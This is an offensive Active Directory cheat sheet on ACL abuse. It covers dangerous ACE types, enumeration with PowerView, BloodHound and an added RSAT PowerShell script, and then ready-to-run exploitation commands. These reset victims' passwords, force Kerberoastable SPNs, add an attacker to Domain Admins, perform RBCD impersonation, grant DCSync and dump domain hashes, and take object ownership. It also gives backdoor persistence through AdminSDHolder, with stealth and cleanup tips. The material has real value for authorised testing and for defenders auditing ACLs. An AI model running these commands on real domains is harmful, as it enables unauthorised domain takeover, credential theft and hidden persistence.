Overview
Every AD object carries a security descriptor whose DACL (Discretionary Access Control List) is an ordered list of ACEs granting or denying rights to principals. Misconfigured or over-delegated ACEs hand low-privilege users control of high-value objects (users, groups, computers, the domain head itself); because they are inherited down the tree and rarely reviewed, they are a reliable escalation and persistence path.
Dangerous ACEs
| ACE | Allows |
|---|---|
| GenericAll | Full control: every right below, plus reading confidential attributes |
| GenericWrite | Write any non-protected attribute (servicePrincipalName, scriptPath, msDS-AllowedToActOnBehalfOfOtherIdentity, ...); does not include extended rights such as password reset |
| WriteDacl | Modify the object's DACL (grant yourself any right, including GenericAll) |
| WriteOwner | Change the object owner; the owner implicitly holds WriteDacl |
| ForceChangePassword | Extended right User-Force-Change-Password: reset the password without knowing the old one |
| AddMember | WriteProperty on the member attribute: add principals to the group (BloodHound edge name, not an ACE flag) |
| AllExtendedRights | ExtendedRight with an empty object GUID: password reset, reading confidential attributes such as the LAPS ms-Mcs-AdmPwd, and on the domain head the DS-Replication-Get-Changes* rights (DCSync) |
Find Dangerous ACLs
PowerView
Find-InterestingDomainAcl -ResolveGUIDs
Get-DomainObjectAcl -Identity USER -ResolveGUIDs
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner"} | select SecurityIdentifier,ActiveDirectoryRights
Find-InterestingDomainAcl already drops ACEs held by default principals (RID below 1000) and resolves the holder to a name. Get-DomainObjectAcl returns raw SIDs, so filter out SYSTEM (S-1-5-18), Administrators (S-1-5-32-544), Domain Admins (RID 512) and Enterprise Admins (RID 519) yourself and resolve the rest with ConvertFrom-SID. (Get-ObjectAcl -SamAccountName is the older PowerView syntax; the dev branch uses Get-DomainObjectAcl -Identity.)
BloodHound
Edges: Owns, GenericAll, GenericWrite, WriteDacl, WriteOwner, ForceChangePassword, AddMember, AllExtendedRights (all produced by SharpHound's ACL collection). The pre-built queries "Shortest Paths to Domain Admins" and "Find Principals with DCSync Rights" chain them for you.
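Added example, not from the original page or from PowerView: the same hunt with the RSAT ActiveDirectory module, for hosts where loading PowerView is not an option. It walks the DACL of every user, group, computer and the domain head under a search base, names the extended-right and attribute GUIDs this page cares about (ForceChangePassword, the three DCSync rights, member, servicePrincipalName, msDS-AllowedToActOnBehalfOfOtherIdentity), and skips the built-in high-privilege principals that hold these rights by design, so what remains maps onto the table above. The trusted-principal list and the search base are assumptions to adjust per domain.

```powershell
# Added example: enumerate dangerous ACEs with the RSAT ActiveDirectory module (no PowerView).
Import-Module ActiveDirectory

# Extended rights / attributes referenced on this page, by schema GUID.
$RightGuids = @{
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password'
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
    'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'member'                                   # WriteProperty => AddMember
    'f3a64788-5306-11d1-a9c5-0000f80367c1' = 'servicePrincipalName'                     # WriteProperty => targeted kerberoast
    '3f78c3e5-f79a-46bd-a0b8-9d18116ddc79' = 'msDS-AllowedToActOnBehalfOfOtherIdentity' # WriteProperty => RBCD
}

# Principals that hold these rights by design; everything else is a finding. Assumption: extend per domain.
$TrustedSids = @('S-1-5-18', 'S-1-5-9', 'S-1-5-10', 'S-1-3-0', 'S-1-5-32-544')  # SYSTEM, Enterprise DCs, SELF, CREATOR OWNER, Administrators
$TrustedRids = @(500, 498, 512, 516, 519, 521)                                      # Administrator, Ent. RODCs, DA, DCs, EA, RODCs

function Test-TrustedSid([System.Security.Principal.SecurityIdentifier]$Sid) {
    if ($TrustedSids -contains $Sid.Value) { return $true }
    if ($Sid.Value -notlike 'S-1-5-21-*') { return $false }        # RID filter only makes sense for domain SIDs
    return $TrustedRids -contains [int]($Sid.Value -split '-')[-1]
}

# True when every bit of $Flag is present in $Rights (GenericAll/GenericWrite are multi-bit masks).
function Test-HasRight([int]$Rights, [System.DirectoryServices.ActiveDirectoryRights]$Flag) {
    ($Rights -band [int]$Flag) -eq [int]$Flag
}

function Get-AceReason([System.DirectoryServices.ActiveDirectoryAccessRule]$Ace) {
    $R      = [System.DirectoryServices.ActiveDirectoryRights]
    $rights = [int]$Ace.ActiveDirectoryRights
    $guid   = $Ace.ObjectType.ToString()
    $found  = @()
    if (Test-HasRight $rights $R::GenericAll) { return 'GenericAll' }      # implies everything below
    if (Test-HasRight $rights $R::WriteDacl)  { $found += 'WriteDacl' }
    if (Test-HasRight $rights $R::WriteOwner) { $found += 'WriteOwner' }
    # GenericWrite proper, or WriteProperty with an empty GUID (= write every attribute)
    if ((Test-HasRight $rights $R::GenericWrite) -or
        ((Test-HasRight $rights $R::WriteProperty) -and $Ace.ObjectType -eq [Guid]::Empty)) { $found += 'GenericWrite' }
    elseif ((Test-HasRight $rights $R::WriteProperty) -and $RightGuids.ContainsKey($guid)) { $found += 'WriteProperty:' + $RightGuids[$guid] }
    if (Test-HasRight $rights $R::ExtendedRight) {
        if ($Ace.ObjectType -eq [Guid]::Empty)   { $found += 'AllExtendedRights' }   # empty GUID = every extended right
        elseif ($RightGuids.ContainsKey($guid))  { $found += $RightGuids[$guid] }
    }
    if ($found.Count -eq 0) { return $null }
    return ($found -join ',')
}

function Find-DangerousAce {
    param(
        [Parameter(Mandatory)][string]$SearchBase,   # e.g. (Get-ADDomain).DistinguishedName
        [string]$LdapFilter = '(|(objectClass=user)(objectClass=group)(objectClass=computer)(objectClass=domainDNS))'
    )
    foreach ($obj in Get-ADObject -LDAPFilter $LdapFilter -SearchBase $SearchBase -SearchScope Subtree) {
        $acl = Get-Acl -Path ('AD:\' + $obj.DistinguishedName)
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) } catch { continue }
            if (Test-TrustedSid $sid) { continue }
            $reason = Get-AceReason $ace
            if (-not $reason) { continue }
            [pscustomobject]@{
                Object      = $obj.DistinguishedName
                ObjectClass = $obj.ObjectClass
                Principal   = $ace.IdentityReference.Value
                Sid         = $sid.Value
                Right       = $reason
                Inherited   = $ace.IsInherited
            }
        }
    }
}

# Usage: Find-DangerousAce -SearchBase (Get-ADDomain).DistinguishedName | Format-Table -AutoSize
```

Get-Acl is one LDAP round trip per object, so scope -SearchBase to an OU in large domains. Account Operators, Exchange groups and similar semi-privileged principals are deliberately not in the trusted list: rights held by them are exactly the kind of path this page is about.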
Exploit — GenericAll on User
Reset Password
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)
net rpc password targetuser 'NewPass123!' -U 'DOMAIN/attacker%password' -S DC_IP
A reset is loud: the user loses access until someone intervenes, and the DC logs event 4724 (password reset) naming the caller.
Set SPN (Targeted Kerberoasting)
Set-DomainObject -Identity targetuser -SET @{serviceprincipalname='fake/spn'}
Get-DomainUser -Identity targetuser | Get-DomainSPNTicket -OutputFormat Hashcat
Set-DomainObject -Identity targetuser -Clear serviceprincipalname
Quieter (the account keeps working), but only pays off if the password cracks. Clear the SPN once you have the hash.
Exploit — GenericAll on Group
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker
net group "Domain Admins" attacker /add /domain
net rpc group addmem "Domain Admins" attacker -U 'DOMAIN/attacker%password' -S DC_IP
The new membership only lands in tokens and TGTs issued after the change: log off and on, or request a fresh TGT, before using it.
Exploit — GenericAll on Computer
# RBCD: write msDS-AllowedToActOnBehalfOfOtherIdentity. Needs an account you control that has an SPN, e.g. a machine account created via MachineAccountQuota.
Set-ADComputer -Identity TARGET$ -PrincipalsAllowedToDelegateToAccount EVIL$
# Then S4U2self/S4U2proxy as EVIL$ to get a service ticket for TARGET as a privileged user, and use the resulting ccache (export KRB5CCNAME=...) against TARGET
impacket-getST -spn cifs/TARGET.domain.local -impersonate Administrator -dc-ip DC_IP 'domain.local/EVIL$:password'
# Caveat: members of Protected Users or accounts marked "sensitive and cannot be delegated" cannot be impersonated this way.
# If LAPS is deployed, GenericAll also lets you read the local admin password directly:
Get-ADComputer -Identity TARGET$ -Properties ms-Mcs-AdmPwd
Exploit — WriteDacl
Grant yourself DCSync rights on the domain head. PowerView's -Rights DCSync adds three ExtendedRight ACEs: DS-Replication-Get-Changes, DS-Replication-Get-Changes-All and DS-Replication-Get-Changes-In-Filtered-Set.
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity attacker -Rights DCSync
Then DCSync (-just-dc skips the SAM/LSA dump, which needs local admin on the DC and only adds noise):
impacket-secretsdump -just-dc DOMAIN/attacker:password@DC_IP
WriteDacl on any other object works the same way with -Rights All; from there the GenericAll paths above apply.
Exploit — WriteOwner
Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity attacker
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity attacker -Rights All
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker
Step 2 works even though the original ACE only granted WriteOwner: the owner of an object implicitly holds ReadControl and WriteDacl over it. On a protected group like Domain Admins, SDProp resets both owner and DACL from AdminSDHolder within the hour, so run the three steps together.
Exploit — ForceChangePassword
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
rpcclient -U 'attacker%password' DC_IP -c "setuserinfo2 targetuser 23 'NewPass!'"
ACL Persistence
Add Hidden DCSync Rights
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity backdoor_user -Rights DCSync
Survives password changes and group cleanups of backdoor_user and is rarely reviewed, but it is visible to BloodHound (DCSync edge) and, if directory-service object auditing is on, in 4662 events carrying the replication GUIDs.
Add GenericAll on Domain Admins
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity backdoor_user -Rights All
Caveat: Domain Admins is a protected group. SDProp re-applies the AdminSDHolder security descriptor to all protected groups and users every 60 minutes by default, so an ACE written directly on the group is removed on the next run. To persist, write it on AdminSDHolder instead and let SDProp propagate it:
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity backdoor_user -Rights All
Quick Reference
| ACE | Exploit |
|---|---|
| GenericAll (user) | Reset password, or set an SPN and kerberoast (quieter) |
| GenericAll (group) | Add yourself to the group |
| GenericAll (computer) | RBCD via msDS-AllowedToActOnBehalfOfOtherIdentity; read ms-Mcs-AdmPwd if LAPS is deployed |
| GenericWrite (user) | Set SPN and kerberoast |
| WriteDacl (domain head) | Grant yourself DCSync rights |
| WriteDacl (other object) | Grant yourself GenericAll, then as above |
| WriteOwner | Take ownership (owner gets WriteDacl) → GenericAll → full control |
| ForceChangePassword | Reset target password |
| AddMember | Add yourself to the group |